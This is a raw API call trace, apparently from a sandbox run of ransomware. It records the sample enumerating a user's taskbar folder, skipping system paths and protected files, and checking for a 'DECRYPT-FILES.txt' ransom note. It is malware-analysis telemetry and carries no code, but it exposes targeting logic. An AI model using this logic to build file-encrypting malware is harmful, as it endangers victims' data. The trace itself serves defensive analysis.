[0180.580] lstrcatW (in: lpString1="TaskBar", lpString2="\\" | out: lpString1="TaskBar\\") returned="TaskBar\\" [0180.580] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="TaskBar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Program Files") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch=":\\Windows") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Games\\") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.580] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\All Users") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="AhnLab") returned 0x0 [0180.581] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0180.581] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.581] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\0a16c9.tmp") returned 118 [0180.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0180.582] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.582] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt") returned 125 [0180.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0180.582] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0180.582] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.582] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.582] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.582] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.582] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec31940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec31940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec31940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.582] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.582] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.582] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.582] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.582] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.582] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.582] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned 107 [0180.582] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.583] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\" [0180.583] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\0a16c9.tmp" [0180.583] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.583] CloseHandle (hObject=0x0) returned 0 [0180.583] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.583] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.583] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.583] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc4b320, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0180.583] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0180.583] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0180.583] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0180.583] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0180.583] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e02c640, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e02c640, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df47e00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0180.583] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.583] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="autorun.inf") returned 1 [0180.583] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="desktop.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="iconcache.db") returned -1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootsect.bak") returned 1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat.log") returned -1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="thumbs.db") returned -1 [0180.584] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Bootfont.bin") returned 1 [0180.584] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0180.584] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.584] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc251c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc251c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="autorun.inf") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="boot.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="desktop.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="ntuser.dat") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="iconcache.db") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="bootsect.bak") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="ntuser.dat.log") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="thumbs.db") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Bootfont.bin") returned 1 [0180.584] lstrlenW (lpString="Internet Explorer (2).lnk") returned 25 [0180.584] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.584] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="autorun.inf") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="desktop.ini") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="iconcache.db") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootsect.bak") returned 1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat.log") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="thumbs.db") returned -1 [0180.584] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0180.584] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0180.584] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.584] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0de7e00, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb65d71b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb65d71b0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x491, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0180.584] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.584] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="autorun.inf") returned 1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="desktop.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat") returned -1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="iconcache.db") returned 1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootsect.bak") returned 1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat.log") returned -1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="thumbs.db") returned -1 [0180.585] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="Bootfont.bin") returned 1 [0180.585] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0180.585] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.585] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="autorun.inf") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="boot.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="desktop.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="ntuser.dat") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="iconcache.db") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="bootsect.bak") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="ntuser.dat.log") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="thumbs.db") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer (2).lnk", lpString2="Bootfont.bin") returned 1 [0180.585] lstrlenW (lpString="Windows Explorer (2).lnk") returned 24 [0180.585] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.585] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="autorun.inf") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="desktop.ini") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="iconcache.db") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootsect.bak") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat.log") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="thumbs.db") returned 1 [0180.585] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="Bootfont.bin") returned 1 [0180.585] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0180.585] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.585] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc4b320, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc4b320, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0180.585] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="autorun.inf") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="boot.ini") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="desktop.ini") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="ntuser.dat") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="iconcache.db") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="bootsect.bak") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="ntuser.dat.log") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="thumbs.db") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player (2).lnk", lpString2="Bootfont.bin") returned 1 [0180.586] lstrlenW (lpString="Windows Media Player (2).lnk") returned 28 [0180.586] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.586] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="autorun.inf") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="boot.ini") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="desktop.ini") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="iconcache.db") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="bootsect.bak") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="ntuser.dat.log") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="thumbs.db") returned 1 [0180.586] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Bootfont.bin") returned 1 [0180.586] lstrlenW (lpString="Windows Media Player.lnk") returned 24 [0180.586] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0180.586] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 